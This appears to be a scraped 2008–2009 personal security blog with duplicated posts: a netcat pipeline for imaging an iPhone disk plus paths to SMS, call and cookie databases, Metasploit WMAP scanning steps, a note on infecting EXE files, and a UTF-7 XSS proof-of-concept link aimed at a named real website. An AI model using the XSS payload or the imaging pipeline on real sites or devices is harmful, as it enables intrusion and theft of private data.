Thursday, February 26, 2009
SQL Queries
Still in the top 10 security threats for 2009 Web Application attacks. During my work i`m facing DB`s that i`m not working on regular basis, which got me to c0mpile a list of queries for mssql, oracle, mysql, postgresql and msaccess. In the following xls file you can find the most used sql injection queries. The list >> constructed from data that i picked from several web sites and dring the days and n1ght of /me @work ;)
Tuesday, February 17, 2009
iPhone 2.2 Backup
In order to make a bit by bit copy use the following method:
On your *nix box open up netcat:
nc -lvp 1337 | dd of=./imagem.dmg bs=4096
On your iPhone/ssh execute the following:
dd if=/dev/rdisk0s2 bs=4096 | netcat 192.168.1.100 1337
If you want to browse y0ur iPhone contents just follow the following directories:
Calendar /mobile/Library/Calendar/calendar.sqlitedb
Call history /mobile/Library/CallHistory/call_history.db
Notes /mobile/Library/Notes/notes.db
SMS /mobile/Library/SMS/sms.db
Adress book /mobile/Library/AddressBook/AddressBook.sqlitedb
voicemail /var/root/Library/Voicemail/voicemail.db
Photos /mobile/Media/DCIM/
Photos /mobile/Media/Photos
Google Maps /moblie/Library/Caches/MapTiles/MapTiles.sqlitedb
Cookies /mobile/Library/Cookies/Cookies.plist
iPhone Recorder /private/var/mobile/Media/iPhoneRecorder
ג'קי אלטל
On your *nix box open up netcat:
nc -lvp 1337 | dd of=./imagem.dmg bs=4096
On your iPhone/ssh execute the following:
dd if=/dev/rdisk0s2 bs=4096 | netcat 192.168.1.100 1337
If you want to browse y0ur iPhone contents just follow the following directories:
Calendar /mobile/Library/Calendar/calendar.sqlitedb
Call history /mobile/Library/CallHistory/call_history.db
Notes /mobile/Library/Notes/notes.db
SMS /mobile/Library/SMS/sms.db
Adress book /mobile/Library/AddressBook/AddressBook.sqlitedb
voicemail /var/root/Library/Voicemail/voicemail.db
Photos /mobile/Media/DCIM/
Photos /mobile/Media/Photos
Google Maps /moblie/Library/Caches/MapTiles/MapTiles.sqlitedb
Cookies /mobile/Library/Cookies/Cookies.plist
iPhone Recorder /private/var/mobile/Media/iPhoneRecorder
ג'קי אלטל
Advanced Exploitation with Metasploit
I decided to write a post about the new/advanced features in my favorite exploitation framework Metasploit. Those improved tools/features in the advanced framework includes wmap (application mapping), autopwn (what does it sounds like?)
WMAP
"WMAP is a general purpose web application scanning framework for Metasploit 3. The architecture is simple and its simplicity is what makes it powerful. It's a different approach compared to other open source alternatives and commercial scanners, as WMAP is not build around any browser or spider for data capture and manipulation."
STEP 1: load sqlite3 database
>load db_sqlite3
STEP 2: Create new database
>db_create wmapjack.db
STEP 3: Load wmap Database
>load db_wmap
STEP 4: Connect to wmap database
>db_connect wmap.db
Now just add web application target address
>wmap_targets -a http://127.0.0.1
Set it to the new target with the following command:
>wmap_targets -s 1
wmap_run - execute application mapping
The active modules are:
wmap_ssl_vhost WMAP_SERVER
frontpage_login WMAP_SERVER
version WMAP_SERVER
wmap_vhost_scanner WMAP_SERVER
wmap_file_same_name_dir WMAP_DIR - this will take a while (bruteforcing directory names)
wmap_reports - view web application report
Test your application
WMAP
"WMAP is a general purpose web application scanning framework for Metasploit 3. The architecture is simple and its simplicity is what makes it powerful. It's a different approach compared to other open source alternatives and commercial scanners, as WMAP is not build around any browser or spider for data capture and manipulation."
STEP 1: load sqlite3 database
>load db_sqlite3
STEP 2: Create new database
>db_create wmapjack.db
STEP 3: Load wmap Database
>load db_wmap
STEP 4: Connect to wmap database
>db_connect wmap.db
Now just add web application target address
>wmap_targets -a http://127.0.0.1
Set it to the new target with the following command:
>wmap_targets -s 1
wmap_run - execute application mapping
The active modules are:
wmap_ssl_vhost WMAP_SERVER
frontpage_login WMAP_SERVER
version WMAP_SERVER
wmap_vhost_scanner WMAP_SERVER
wmap_file_same_name_dir WMAP_DIR - this will take a while (bruteforcing directory names)
wmap_reports - view web application report
Test your application
Wednesday, February 11, 2009
BackTrack 4 Beta released
BT4 - New & improved version, The best so far......another great work by the remote exploit team. some new and exciting features. The most significant of these changes is the expansion from the realm of a Pentesting LiveCD towards a full blown "Distribution".
DOWNLOAD: BackTrack 4 Beta
DOWNLOAD: BackTrack 4 Beta
Sunday, July 20, 2008
Flow hiJACKing
Application flow hijacking is one of the popular methods to infect EXE files, by the use of this method one can inject malicious \xHEXa code into application code section and then ask the instruction pointer to execute it as a part of the original code. Read More here... hiJACKing
Saturday, July 12, 2008
Tools In The Box
New / 0ld applications in the tools section......
Super ShellCode - Superman shell code sound track. Isntead of running calc as a shell code I decided to code my own super rintchi shell code. open the file with olly and copy/use the relevant code as a shell code.
ShareWatcher - A small .NET application that will watch NetBios connection to your PC. It will alert and log all connections.
TrafficViewer - Israeli road cameras (watch 8 cams in one window).
PS Whats that? data = google.doGoogleSearch(query,maxResults=20)
Enjoy.
Super ShellCode - Superman shell code sound track. Isntead of running calc as a shell code I decided to code my own super rintchi shell code. open the file with olly and copy/use the relevant code as a shell code.
ShareWatcher - A small .NET application that will watch NetBios connection to your PC. It will alert and log all connections.
TrafficViewer - Israeli road cameras (watch 8 cams in one window).
PS Whats that? data = google.doGoogleSearch(query,maxResults=20)
Enjoy.
Tuesday, July 8, 2008
XSS UTF-7
Lament (my best student so far....) discovered a new XSS vulnerability in Apache server (two months ago and still unfixed). read about Cross-site Scripting here.
This vulnerability can show us that we can`t blindly TRUST links from known domain names. In the following POC we can see that walla.co.il is vulnerable just like all the other websites that running Apache server.
POC
Open new Explorer and paste the following link:
http://www.walla.co.il/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqz
bX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblM
XsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYe
Ogc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont
%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('I XSSedYOU!!!')+ADw-/script+AD4---//--
Next, right click on the page and change encoding to auto select. BOOM. A message box should be opened now.
Conclusion, if you recieve a long encrypted link just dont open it. BE AWARE.
This vulnerability can show us that we can`t blindly TRUST links from known domain names. In the following POC we can see that walla.co.il is vulnerable just like all the other websites that running Apache server.
POC
Open new Explorer and paste the following link:
http://www.walla.co.il/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqz
bX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblM
XsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYe
Ogc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont
%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('I XSSedYOU!!!')+ADw-/script+AD4---//--
Next, right click on the page and change encoding to auto select. BOOM. A message box should be opened now.
Conclusion, if you recieve a long encrypted link just dont open it. BE AWARE.
Subscribe to:
Comments (Atom)
Posts
